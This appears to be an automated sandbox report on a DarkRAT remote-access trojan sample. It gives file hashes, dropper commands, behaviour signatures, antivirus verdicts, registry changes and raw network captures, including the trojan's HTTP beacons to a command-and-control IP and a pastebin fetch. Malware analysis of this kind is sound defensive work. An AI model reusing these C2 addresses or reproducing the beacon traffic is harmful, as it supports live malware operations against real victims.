- * MalFamily: "Darkrat"
- * MalScore: 10.0
- * File Name: "Exes_e8e44a60d885a42f35fa9fcfdb861b1c.exe"
- * File Size: 991232
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "07c41d2bdb251269b0883b0880068f1480443e4fbd0c9e6f4e5b1b5004148d1c"
- * MD5: "e8e44a60d885a42f35fa9fcfdb861b1c"
- * SHA1: "27751d098c4289645d93a46297ae302236e82989"
- * SHA512: "2377dd0c5b81cb57b8ee98a57fce137a15dc8166425f613934673ec6d119efd5b7bb0f433f68290094591769b4a24b6fc26ed73f70432dcbda664fe9c067b140"
- * CRC32: "64FBA69E"
- * SSDEEP: "24576:ovfF4K7D53n3Un3BnvHfjVZ0FIECXXEVFU:gP93sj7vBAS"
- * Process Execution:
- "Exes_e8e44a60d885a42f35fa9fcfdb861b1c.exe",
- "cmd.exe",
- "VZXeFFOcuZ.exe"
- * Executed Commands:
- "\"C:\\Windows\\System32\\cmd.exe\" /C start C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe",
- "cmd /C start C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe"
- * Signatures Detected:
- "Description": "Creates RWX memory",
- "Details":
- "Description": "A process created a hidden window",
- "Details":
- "Process": "Exes_e8e44a60d885a42f35fa9fcfdb861b1c.exe -> cmd"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- "suspicious_request": "http://138.68.217.234/request"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://pastebin.com/raw/JyTUuzPa"
- "url": "http://138.68.217.234/request"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "VZXeFFOcuZ.exe (1456) called API NtQueryInformationFile 29112 times"
- "Spam": "Exes_e8e44a60d885a42f35fa9fcfdb861b1c.exe (572) called API NtQueryInformationFile 29112 times"
- "Description": "Network activity detected but not expressed in API logs",
- "Details":
- "Description": "File has been identified by 18 Antiviruses on VirusTotal as malicious",
- "Details":
- "FireEye": "Generic.mg.e8e44a60d885a42f"
- "McAfee": "RDN/Generic.dx"
- "CrowdStrike": "win/malicious_confidence_70% (W)"
- "Invincea": "heuristic"
- "APEX": "Malicious"
- "Kaspersky": "UDS:DangerousObject.Multi.Generic"
- "AegisLab": "Trojan.Multi.Generic.4!c"
- "McAfee-GW-Edition": "BehavesLike.Win32.Dropper.dh"
- "Trapmine": "malicious.high.ml.score"
- "SentinelOne": "DFI - Suspicious PE"
- "Microsoft": "Trojan:Win32/Zpevdo.A"
- "Endgame": "malicious (high confidence)"
- "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
- "Acronis": "suspicious"
- "Cylance": "Unsafe"
- "ESET-NOD32": "a variant of Win32/GenKryptik.DQNV"
- "Rising": "Trojan.GenKryptik!8.AA55 (CLOUD)"
- "Fortinet": "W32/GenKryptik.DQNV!tr"
- "Description": "Creates a copy of itself",
- "Details":
- "copy": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe"
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN Win32/DarkRAT CnC Activity"
- * Started Service:
- * Mutexes:
- "Local\\kupaw",
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\VZXeFFOcuZ.exe"
- * Deleted Files:
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Local AppWizard-Generated Applications",
- "HKEY_CURRENT_USER\\Software\\Local AppWizard-Generated Applications\\HexEditor",
- "HKEY_CURRENT_USER\\Software\\Local AppWizard-Generated Applications\\HexEditor\\Recent File List",
- "HKEY_CURRENT_USER\\Software\\Local AppWizard-Generated Applications\\HexEditor\\Settings",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect"
- * Deleted Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
- * DNS Communications:
- "type": "A",
- "request": "pastebin.com",
- "answers":
- "data": "104.20.209.21",
- "type": "A"
- "data": "104.20.208.21",
- "type": "A"
- * Domains:
- "ip": "104.20.209.21",
- "domain": "pastebin.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://pastebin.com/raw/JyTUuzPa",
- "user-agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3",
- "method": "GET",
- "host": "pastebin.com",
- "version": "1.1",
- "path": "/raw/JyTUuzPa",
- "data": "GET /raw/JyTUuzPa HTTP/1.1\r\nAccept: text/plain\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3\r\nHost: pastebin.com\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "request=YUhkcFpEMWpNVFV4TldFeE1pMHhOelkwTFRRMk16SXRZV05sT1MxaE9XUm1aamt5TlRNeU1EQW1ZMjl0Y0hWMFpYSnVZVzFsUFZOQ1ZWYzNXRFkwSm1GdmNtNXZkRDEwY25WbEptbHVjM1JoYkd4bFpGSmhiVDB6TGprNU9UVTJOU1p1WlhSR2NtRnRaWGR2Y21zeVBYUnlkV1VtYm1WMFJuSmhiV1YzYjNKck16MTBjblZsSm01bGRFWnlZVzFsZDI5eWF6TTFQWFJ5ZFdVbWJtVjBSbkpoYldWM2IzSnJORDFtWVd4elpTWmhiblJwZG1seWRYTTlKbUp2ZEhabGNuTnBiMjQ5TWk0eExqTW1aM0IxVG1GdFpUMWtSemxyWW5jOVBTWmpjSFZPWVcxbFBVbERRV2RKUTBGblNVVnNkV1JIVm5OTFJrbHdTVVpvYkdJeU5HOVZhV3RuVVRGQ1ZrbEZWVEZNVkVreVRucEJaMDFEUWtGSlJFbDFUbXBDU0ZOSWJ6MG1ZWEpqYUQxbFJGa3dKbTl3WlhKcGJtZHplWE4wWlcwOVZqSnNkVnBIT1ROamVVRXpTVVpPYkdOdVduQlpNbFZuVlVkR2FtRjVRWGdtYzNCeVpXRmtkR0ZuUFhCaGJHbDM=",
- "uri": "http://138.68.217.234/request",
- "user-agent": "gate",
- "method": "POST",
- "host": "138.68.217.234",
- "version": "1.1",
- "path": "/request",
- "data": "POST /request HTTP/1.1\r\nAccept: text/plain\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: gate\r\nHost: 138.68.217.234\r\nContent-Length: 660\r\n\r\nrequest=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",
- "port": 80
- "count": 25,
- "body": "request=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",
- "uri": "http://138.68.217.234/request",
- "user-agent": "gate",
- "method": "POST",
- "host": "138.68.217.234",
- "version": "1.1",
- "path": "/request",
- "data": "POST /request HTTP/1.1\r\nAccept: text/plain\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: gate\r\nHost: 138.68.217.234\r\nContent-Length: 660\r\nCookie: PHPSESSID=fn93a21vhk143tblikrctn9of7\r\n\r\nrequest=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",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC: